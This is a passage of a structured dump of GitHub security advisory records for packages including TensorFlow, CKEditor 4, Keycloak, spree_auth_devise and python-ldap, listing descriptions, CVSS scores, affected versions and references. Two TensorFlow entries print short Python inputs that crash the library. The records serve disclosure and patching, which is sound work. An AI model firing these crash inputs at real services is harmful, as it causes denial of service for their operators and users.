'0'}, {'fixed': '8.5.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22970'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1364797'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/857-release-notes'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/901-release-notes'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:24:09Z', 'nvd_published_at': '2021-11-19T19:15:00Z'}" +1.4.0,GHSA-x24j-87x9-jvv5,2022-08-11T22:06:27Z,2021-11-03T17:34:22Z,,['CVE-2021-25973'],Publify `guest` role users can self-register even when the admin does not allow it,"In Publify, 9.0.0.pre1 to 9.2.4 are vulnerable to Improper Access Control. `guest` role users can self-register even when the admin does not allow it. This happens due to front-end restriction only.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'publify_core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0.pre1'}, {'fixed': '9.2.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25973'}, {'type': 'WEB', 'url': 'https://github.com/publify/publify/commit/3447e0241e921b65f6eb1090453d8ea73e98387e'}, {'type': 'PACKAGE', 'url': 'https://github.com/publify/publify/'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/publify_core/CVE-2021-25973.yml'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25973'}]","{'cwe_ids': ['CWE-285', 'CWE-669', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T14:44:37Z', 'nvd_published_at': '2021-11-02T07:15:00Z'}" +1.4.0,GHSA-844m-cpr9-jcmh,2022-08-11T18:31:09Z,2021-11-15T17:54:01Z,,['CVE-2021-41263'],Rails Multisite secure/signed cookies share secrets between sites in a multi-site application,"### Impact +This vulnerability impacts any Rails applications using `rails_multisite` alongside Rails' signed/encrypted cookies. Depending on how the application makes use of these cookies, it may be possible for an attacker to re-use cookies on different 'sites' within a multi-site Rails application. + +### Patches +The issue has been patched in v4 of the `rails_multisite` gem. Note that this upgrade will invalidate all previous signed/encrypted cookies. The impact of this invalidation will vary based on the application architecture.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'rails_multisite'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/discourse/rails_multisite/security/advisories/GHSA-844m-cpr9-jcmh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41263'}, {'type': 'WEB', 'url': 'https://github.com/discourse/rails_multisite/commit/c6785cdb5c9277dd2c5ac8d55180dd1ece440ed0'}, {'type': 'PACKAGE', 'url': 'https://github.com/discourse/rails_multisite'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rails_multisite/CVE-2021-41263.yml'}]","{'cwe_ids': ['CWE-200', 'CWE-327', 'CWE-565'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T17:53:35Z', 'nvd_published_at': '2021-11-15T20:15:00Z'}" +1.4.0,GHSA-v899-28g4-qmh8,2021-11-03T14:51:05Z,2021-11-01T19:19:54Z,,['CVE-2020-26705'],XML External Entity vulnerability in Easy-XML,The parseXML function in Easy-XML 0.5.0 was discovered to have a XML External Entity (XXE) vulnerability which allows for an attacker to expose sensitive data or perform a denial of service (DOS) via a crafted external entity entered into the XML content as input.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'easy-xml'}, 'ecosystem_specific': {'affected_functions': ['EasyXML.parseXML']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26705'}, {'type': 'WEB', 'url': 'https://github.com/darkfoxprime/python-easy_xml/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/darkfoxprime/python-easy_xml'}]","{'cwe_ids': ['CWE-611'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T19:12:25Z', 'nvd_published_at': '2021-10-31T20:15:00Z'}" +1.4.0,GHSA-r8wq-qrxc-hmcm,2021-11-26T18:26:27Z,2021-11-29T17:58:59Z,,[],ReDoS in LDAP schema parser,"https://github.com/python-ldap/python-ldap/issues/424 + +### Impact +The LDAP schema parser of python-ldap 3.3.1 and earlier are vulnerable to a regular expression denial-of-service attack. The issue affects clients that use ``ldap.schema`` package to parse LDAP schema definitions from an untrusted source. + +### Patches +The upcoming release of python-ldap 3.4.0 will contain a workaround to prevent ReDoS attacks. The schema parser refuses schema definitions with an excessive amount of backslashes. + +### Workarounds +As a workaround, users can check input for excessive amount of backslashes in schemas. More than a dozen backslashes per line are atypical. + +### References +[CWE-1333](https://cwe.mitre.org/data/definitions/1333.html) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [python-ldap](https://github.com/python-ldap/python-ldap) tracker +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'python-ldap'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/python-ldap/python-ldap/security/advisories/GHSA-r8wq-qrxc-hmcm'}, {'type': 'WEB', 'url': 'https://github.com/python-ldap/python-ldap/issues/424'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-ldap/python-ldap'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-26T18:26:27Z', 'nvd_published_at': None}" +1.4.0,GHSA-7h26-63m7-qhf2,2022-02-08T20:39:10Z,2021-11-17T21:58:25Z,,['CVE-2021-41165'],HTML comments vulnerability allowing to execute JavaScript code,"### Affected packages +The vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4. + +### Impact +A potential vulnerability has been discovered in CKEditor 4 HTML processing core module. The vulnerability allowed to inject malformed comments HTML bypassing content sanitization, which could result in executing JavaScript code. It affects all users using the CKEditor 4 at version < 4.17.0. + +### Patches +The problem has been recognized and patched. The fix will be available in version 4.17.0. + +### For more information +Email us at security@cksource.com if you have any questions or comments about this advisory. + +### Acknowledgements +The CKEditor 4 team would like to thank William Bowling ([wbowling](https://github.com/wbowling)) for recognizing and reporting this vulnerability. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'ckeditor4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.17.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7h26-63m7-qhf2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41165'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckeditor/ckeditor4'}, {'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/blob/major/CHANGES.md#ckeditor-417'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2021-011'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T19:57:11Z', 'nvd_published_at': '2021-11-17T20:15:00Z'}" +1.4.0,GHSA-mjww-934m-h4jw,2022-09-01T20:13:29Z,2021-11-19T20:19:53Z,,['CVE-2020-29457'],Improper Certificate Validation in OPCFoundation.NetStandard.Opc.Ua.Core,A Privilege Elevation vulnerability in OPC UA .NET Standard Stack 1.4.363.107 allows attackers to establish a connection using invalid certificates.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'OPCFoundation.NetStandard.Opc.Ua.Core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.365.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.4.365.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29457'}, {'type': 'WEB', 'url': 'https://github.com/OPCFoundation/UA-.NETStandard/pull/1229'}, {'type': 'WEB', 'url': 'https://github.com/OPCFoundation/UA-.NETStandard/pull/1229/commits/d815cfb972bd668c1b6e461f6ff97519d6b26f25'}, {'type': 'PACKAGE', 'url': 'https://github.com/OPCFoundation/UA-.NETStandard/'}, {'type': 'WEB', 'url': 'https://opcfoundation.org/SecurityBulletins/OPC%20Foundation%20Security%20Bulletin%20CVE-2020-29457.pdf'}, {'type': 'WEB', 'url': 'https://www.nuget.org/packages/OPCFoundation.NetStandard.Opc.Ua/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T21:55:21Z', 'nvd_published_at': '2021-02-16T20:15:00Z'}" +1.4.0,GHSA-mw6q-98mp-g8g8,2023-01-23T18:49:17Z,2021-11-08T17:54:46Z,,['CVE-2021-23472'],Cross-site Scripting in bootstrap-table,This affects all versions of package bootstrap-table. A type confusion vulnerability can lead to a bypass of input sanitization when the input provided to the escapeHTML function is an array (instead of a string) even if the escape attribute is set.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bootstrap-table'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.19.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23472'}, {'type': 'PACKAGE', 'url': 'https://github.com/wenzhixin/bootstrap-table'}, {'type': 'WEB', 'url': 'https://github.com/wenzhixin/bootstrap-table/blob/develop/src/utils/index.js%23L218'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-BOOTSTRAPTABLE-1657597'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1910690'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1910689'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBWENZHIXIN-1910687'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1910688'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-BOOTSTRAPTABLE-1657597'}]","{'cwe_ids': ['CWE-79', 'CWE-843'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T17:00:48Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}" +1.4.0,GHSA-c9x9-xv66-xp3v,2021-11-08T18:54:51Z,2021-11-10T15:30:36Z,,['CVE-2020-14389'],Improper privilege management in Keycloak,"A flaw was found in Keycloak, where it would permit a user with a view-profile role to manage the resources in the new account console. This flaw allows a user with a view-profile role to access and modify data for which the user does not have adequate permission.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-14389'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2020-14389'}]","{'cwe_ids': ['CWE-269', 'CWE-916'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T18:54:51Z', 'nvd_published_at': '2020-11-17T02:15:00Z'}" +1.4.0,GHSA-8xfw-5q82-3652,2023-05-26T15:07:05Z,2021-11-18T20:15:23Z,,[],Authentication Bypass by CSRF Weakness,"### Impact + +CSRF vulnerability that allows user account takeover. + +All applications using any version of the frontend component of `spree_auth_devise` are affected if `protect_from_forgery` method is both: + +* Executed whether as: + * A before_action callback (the default) + * A prepend_before_action (option prepend: true given) before the :load_object hook in Spree::UserController (most likely order to find). +* Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception). + +That means that applications that haven't been configured differently from what it's generated with Rails aren't affected. + +Thanks @waiting-for-dev for reporting and providing a patch 👏 + +### Patches + +Spree 4.1 users should update to spree_auth_devise 4.1.1 + +### Workarounds + +If possible, change your strategy to :exception: + +```ruby +class ApplicationController < ActionController::Base + protect_from_forgery with: :exception +end +``` + +Add the following to`config/application.rb `to at least run the `:exception` strategy on the affected controller: + +```ruby +config.after_initialize do + Spree::UsersController.protect_from_forgery with: :exception +end +``` + +### References +https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2 +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'spree_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.1'}]}], 'versions': ['4.1.0']}]","[{'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2'}, {'type': 'WEB', 'url': 'https://github.com/spree/spree_auth_devise/security/advisories/GHSA-8xfw-5q82-3652'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2021-41275.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/spree/spree_auth_devise'}]","{'cwe_ids': ['CWE-352'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T21:44:45Z', 'nvd_published_at': None}" +1.4.0,GHSA-w2f4-hxpm-mq98,2021-11-17T21:12:00Z,2021-11-15T23:17:37Z,,['CVE-2021-3915'],bookstack is vulnerable to Unrestricted Upload of File with Dangerous Type,bookstack is vulnerable to Unrestricted Upload of File with Dangerous Type.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'ssddanbrown/bookstack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3915'}, {'type': 'WEB', 'url': 'https://github.com/bookstackapp/bookstack/commit/ae155d67454d6b9f6c93b2bb457aaa4b2eb1a9ed'}, {'type': 'PACKAGE', 'url': 'https://github.com/BookStackApp/BookStack'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/fcb65f2d-257a-46f4-bac9-f6ded5649079'}]","{'cwe_ids': ['CWE-434'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T20:34:14Z', 'nvd_published_at': '2021-11-13T10:15:00Z'}" +1.4.0,GHSA-6mqr-q86q-6gwr,2023-05-26T15:07:57Z,2021-11-18T20:15:09Z,,[],Authentication Bypass by CSRF Weakness,"### Impact + +CSRF vulnerability that allows user account takeover. + +All applications using any version of the frontend component of `spree_auth_devise` are affected if `protect_from_forgery` method is both: + +* Executed whether as: + * A before_action callback (the default) + * A prepend_before_action (option prepend: true given) before the :load_object hook in Spree::UserController (most likely order to find). +* Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception). + +That means that applications that haven't been configured differently from what it's generated with Rails aren't affected. + +Thanks @waiting-for-dev for reporting and providing a patch 👏 + +### Patches + +Spree 4.3 users should update to spree_auth_devise 4.4.1 +Spree 4.2 users should update to spree_auth_devise 4.2.1 + +### Workarounds + +If possible, change your strategy to :exception: + +```ruby +class ApplicationController < ActionController::Base + protect_from_forgery with: :exception +end +``` + +Add the following to`config/application.rb `to at least run the `:exception` strategy on the affected controller: + +```ruby +config.after_initialize do + Spree::UsersController.protect_from_forgery with: :exception +end +``` + +### References +https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2 +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'spree_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.1'}]}], 'versions': ['4.2.0']}]","[{'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2'}, {'type': 'WEB', 'url': 'https://github.com/spree/spree_auth_devise/security/advisories/GHSA-6mqr-q86q-6gwr'}, {'type': 'WEB', 'url': 'https://github.com/spree/spree_auth_devise/commit/50bf2444a851f10dff926eb4ea3674976d9d279d'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2021-41275.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/spree/spree_auth_devise'}]","{'cwe_ids': ['CWE-352'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T21:43:39Z', 'nvd_published_at': None}" +1.4.0,GHSA-458f-26r3-x2c3,2021-11-25T00:24:32Z,2021-11-29T18:00:21Z,,['CVE-2021-20848'],Cross-site Scripting in github.com/schollz/rwtxt,Cross-site scripting vulnerability in rwtxt versions prior to v1.8.6 allows a remote attacker to inject an arbitrary script via unspecified vectors.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/schollz/rwtxt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20848'}, {'type': 'WEB', 'url': 'https://github.com/schollz/rwtxt/commit/c09fb17375c4c47b49524c688288af1fe20e730a'}, {'type': 'PACKAGE', 'url': 'https://github.com/schollz/rwtxt'}, {'type': 'WEB', 'url': 'https://jvn.jp/en/jp/JVN22515597/index.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-25T00:24:32Z', 'nvd_published_at': '2021-11-24T16:15:00Z'}" +1.4.0,GHSA-xrqm-fpgr-6hhx,2021-11-08T22:47:54Z,2021-11-10T19:13:16Z,,['CVE-2021-41202'],Overflow/crash in `tf.range`,"### Impact +While calculating the size of the output within the `tf.range` kernel, there is a conditional statement of type `int64 = condition ? int64 : double`. Due to C++ implicit conversion rules, both branches of the condition will be cast to `double` and the result would be truncated before the assignment. This result in overflows: + +```python +import tensorflow as tf + +tf.sparse.eye(num_rows=9223372036854775807, num_columns=None) +``` + +Similarly, `tf.range` would result in crashes due to overflows if the start or end point are too large. + +```python +import tensorflow as tf + +tf.range(start=-1e+38, limit=1) +``` + +### Patches +We have patched the issue in GitHub commits [6d94002a09711d297dbba90390d5482b76113899](https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899) (merging [#51359](https://github.com/tensorflow/tensorflow/pull/51359)) and [1b0e0ec27e7895b9985076eab32445026ae5ca94](https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94) (merging [#51711](https://github.com/tensorflow/tensorflow/pull/51711)). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported externally via [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46912), [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46899) and [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46889). +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xrqm-fpgr-6hhx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41202'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/46889'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/46912'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-681'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:47:54Z', 'nvd_published_at': '2021-11-05T22:15:00Z'}" +1.4.0,GHSA-m539-j985-hcr8,2021-11-08T22:56:11Z,2021-11-10T19:36:21Z,,['CVE-2021-41196'],Crash in `max_pool3d` when size argument is 0 or negative,"### Impact +The Keras pooling layers can trigger a segfault if the size of the pool is 0 or if a dimension is negative: + +```python +import tensorflow as tf + +pool_size = [2, 2, 0] +layer = tf.keras.layers.MaxPooling3D(strides=1, pool_size=pool_size) +input_tensor = tf.random.uniform([3, 4, 10, 11, 12], dtype=tf.float32) +res = layer(input_tensor) +``` + +This is due to the TensorFlow's implementation of pooling operations where the values in the sliding window are not checked to be strictly positive. + +### Patches +We have patched the issue in GitHub commit [12b1ff82b3f26ff8de17e58703231d5a02ef1b8b](https://github.com/tensorflow/tensorflow/commit/12b1ff82b3f26ff8de17e58703231d5a02ef1b8b) (merging [#51975](https://github.com/tensorflow/tensorflow/pull/51975)). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported externally via a [GitHub issue](https://github.com/tensorflow/tensorflow/issues/51936). +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-m539-j985-hcr8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41196'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/51936'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/12b1ff82b3f26ff8de17e58703231d5a02ef1b8b'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-191'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:56:11Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}" +1.4.0,GHSA-vpf5-82c8-9v36,2022-07-05T18:01:27Z,2021-11-23T21:15:35Z,,['CVE-2021-23433'],Prototype Pollution in algoliasearch-helper,The package algoliasearch-helper before 3.6.2 are vulnerable to Prototype Pollution due to use of the merge function in src/SearchParameters/index.jsSearchParameters._parseNumbers without any protection against prototype properties. Note that this vulnerability is only exploitable if the implementation allows users to define arbitrary search patterns.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'algoliasearch-helper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23433'}, {'type': 'WEB', 'url': 'https://github.com/algolia/algoliasearch-helper-js/commit/4ff542b70b92a6b81cce8b9255700b0bc0817edd'}, {'type': 'PACKAGE', 'url': 'https://github.com/algolia/algoliasearch-helper-js'}, {'type': 'WEB', 'url': 'https://github.com/algolia/algoliasearch-helper-js/blob/3.5.5/src/SearchParameters/index.js%23L291'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ALGOLIASEARCHHELPER-1570421'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:34:30Z', 'nvd_published_at': '2021-11-19T20:15:00Z'}" 